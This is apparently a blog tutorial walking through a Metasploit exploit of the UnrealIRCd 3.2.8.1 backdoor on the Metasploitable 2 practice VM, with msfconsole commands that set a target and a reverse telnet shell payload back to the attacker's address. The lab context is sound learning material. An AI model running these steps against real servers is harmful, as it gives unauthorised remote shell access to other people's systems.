Comments

Pages

Wednesday, 17 October 2012

Metasploitable 2 has been pWned - Part 2

Posted by at 01:00 Read our previous post
After posting about pentest on Metasploitable v.2 (here),  I will continue to attack again on machine target using result from Nmap scanning before. You can see the available service here.
Ok, in this post the target service is Unreal IRCd.


  1. Run the Metasploit
  2. Search exploit for Unreal IRCd using metasploit
    # msf > search unreal irc
  3. It will returned :
    exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12 00:00:00 UTC  excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution
  4. Now, use the exploit above
    # msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
  5. See what the available configuration for this exploit
    # msf  exploit(unreal_ircd_3281_backdoor) > show options
    It will returned,
    Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  6667             yes       The target port


Exploit target:

Id  Name
--  ----
0   Automatic Target
  6. Set the RHOST,
    # msf  exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.56.103
  7. Show the available payloads,
    # msf  exploit(unreal_ircd_3281_backdoor) > show payloads
    returned:
    ompatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_perl                        normal  Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                   normal  Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby                        normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                   normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                          normal  Unix Command Shell, Double reverse TCP (telnet)
   cmd/unix/reverse_perl                     normal  Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_ruby                     normal  Unix Command Shell, Reverse TCP (via Ruby)
  8. I will use cmd/unix/reverse for telnet connection,
    # msf  exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/reverse
  9. See the configuration for the payload,
    # msf  exploit(unreal_ircd_3281_backdoor) > show payloads
    returned,
    Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.56.103   yes       The target address
   RPORT  6667             yes       The target port


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target
  10. Set the LHOST with our IP Address
    # msf  exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.56.101
  11. Now, launch the exploit
    # msf  exploit(unreal_ircd_3281_backdoor) > exploit
  12. OK, wait for a minute and you will bringing into linux shell... type uname -a for test
    # uname -a

Posted by shinigami at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)
©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template